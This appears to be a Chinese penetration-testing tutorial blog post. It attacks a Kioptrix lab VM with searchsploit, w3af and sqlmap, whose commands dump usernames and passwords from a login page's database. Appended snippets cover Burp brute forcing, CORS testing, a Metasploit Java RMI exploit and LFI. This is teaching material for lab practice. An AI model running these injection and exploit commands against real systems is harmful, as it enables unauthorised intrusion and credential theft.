渗透测试漏洞利用之漏洞攻击

1. 查找目标系统的相关漏洞

  在前一篇渗透测试的博文中,介绍了目标系统相关信息的收集方法。接下来,任意Kioptrix靶机为例,具体介绍下相关漏洞的详细利用过程。

  在exploit-db.com网站上,一般能够找到已知漏洞的有价值的信息,以及验证其有效性的概念验证代码(POC)。概念验证代码可以帮助你理解这个漏洞的原理和形成机制,从而让你能够确定防护措施是否正常工作。

2. 离线的漏洞库

  在Kali Linux中,自动包含了一份漏洞库在/usr/share/exploitdb/中。使用searchsploit命令进行搜素漏洞。

  # searchploit samba

  

  

  这是列出了samba服务器对应版本的各种漏洞信息,仔细查看,并没有我们目标系统samba服务器(上一章博文中最后扫描中列出)3.0.28a相关的漏洞,这时我们可以去网上搜所,也可以更新本地的漏洞库,这里不作详述了。

3. 使用w3af工具

  w3af是一个web漏洞扫描利用的神器。下面介绍一下他的使用方法。在Kali Linux的终端下输入w3af_gui,启动它的图形界面版。

  

  

  然后在scan config中选择“full_audit”,勾选bruteforce插件,再在Target地址栏中输入目标靶机的URL,然后点击“Start”开始扫描。

  

  

  在log标签栏中可以查看扫描的日志。

  

  

  在Result标签栏中可以查看扫描的结果,在结果中可以看到一些红色标记的漏洞,有sqli(SQL注入)漏洞,click_hajacking漏洞。这些都是可利用的漏洞。

  

  

4. 使用sqlmap进行sql注入

  1). 使用sqlmap命令,dump出入侵所需要用到的数据库信息。

  # sqlmap -u 192.168.50.102/checklogin.php --data mypassword=1


  **注意:**192.168.50.102提供的登录服务是POST的方式,要用–data选项,后跟要发送的内容。


  

  使用下列命令列出所有的数据库。

sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1

  

  

  查看members数据库的内容:

  sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members --tables

  

  

  列出表的列名:

 sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members --columns

  

  

  列出表内容:

  # sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members -C username,password --dump

  

  

时间: 2024-09-30 10:28:19

渗透测试漏洞利用之漏洞攻击的相关文章

渗透测试_利用Burp爆破用户名与密码

burp 全称 Burp Suite, 是用于攻击web 应用程序的集成平台.它包含了许多工具,可以抓包可以爆破也可以扫描漏洞. 主要组件如下: Proxy--是一个拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流. Spider--是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能. Scanner[仅限专业版]--是一个高级的工具,执行后,它能自动地发现web 应用程序的安全漏洞. Intruder--是一

CORS漏洞利用检测和利用方式

CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访问网站 curl https://www.huasec.com -H "Origin: https://test.com" -I 检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com 2.burpsuite发送请求包,查看返回包

Java rmi漏洞利用及原理记录

CVE-2011-3556 该模块利用了RMI的默认配置.注册表和RMI激活服务,允许加载类来自任何远程(HTTP)URL.当它在RMI中调用一个方法时分布式垃圾收集器,可通过每个RMI使用endpoint,它可以用于rmiregist和rmid,以及对大多 漏洞利用: 漏洞常用端口1099 msf5 > use exploit/multi/misc/java_rmi_server msf5 exploit(multi/misc/java_rmi_server) > show options

渗透测试技术之本地文件包含

概述 通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞.在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞.此外,在本文中提到有一些技术,在CTF大赛中也经常被利用. 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器上的文件.当一个WEB应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据.注入路径遍历字符.包含web服务器的其他

Web渗透测试使用Kali Linux(一)渗透测试概要及环境部署

渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具. 结合白盒测试.黑盒测试.灰盒测试 Kali Linux测试一般步骤: 第一步,侦察 第二步,目录测试 第三步,漏洞利用 第四步,提升权限 第五步,保持访问 未完待续...

看携程网的数据丢失,了解什么是渗透测试

随着国内外重大信息安全事故数量的急剧增长(比如上次的携程网络瘫痪,虽然后面证实是内部人员的错误操作,但是真实信息到底是什么呢,我们也不知道),安全在整个IT行业中的不断升温,国内外渗透测试从业者也不断的增多,但是安全体系庞大复杂,并非朝夕就能掌握相关的专业知识和技能. 实际上渗透测试并没有严格的分类方式,即使在软件开发生命周期中,也包含了渗透测试的环节,但根据实际应用,普遍认同的几种分类方法如下: 方法分类 1.黑箱测试 黑箱测试又被称为所谓的"Zero-Knowledge Testing&qu

搭建渗透测试环境选自KaliLinux无线网络渗透测试教程

第1章搭建渗透测试环境 许多提供安全服务的机构会使用一些术语,如安全审计.网络或风险评估.以及渗透测试.这些术语在含义上有一些重叠,从定义上来看,审计是对系统或应用的量化的技术评估.安全评估意为对风险的评测,是指用以发现系统.应用和过程中存在的漏洞的服务.渗透测试的含义则不只是评估.它会用已发现的漏洞来进行测试,以验证该漏洞是否真的存在.本章将介绍搭建渗透测试环境.选自KaliLinux无线网络渗透测试教程 1.1  什么是渗透测试 渗透测试并没有一个标准的定义.国外一些安全组织达成共识的通用说

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

UDomain话你知 | 渗透测试是什么?

渗透测试Penetration Test,简称PT,是企业委请可靠的第三方专业安全服务团队,运用黑客思维尝试对企业网络进行攻击,进而找出潜在的安全漏洞,同时评估信息系统与硬件的全盘架构,确认其安全性是否有待加强. 渗透测试是一种对系统的任何弱点.技术缺陷或漏洞的主动分析,防范于未然. 渗透测试和黑客入侵的区别: 渗透测试是经过客户授权,采用可控制.非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性. 为什么企业需要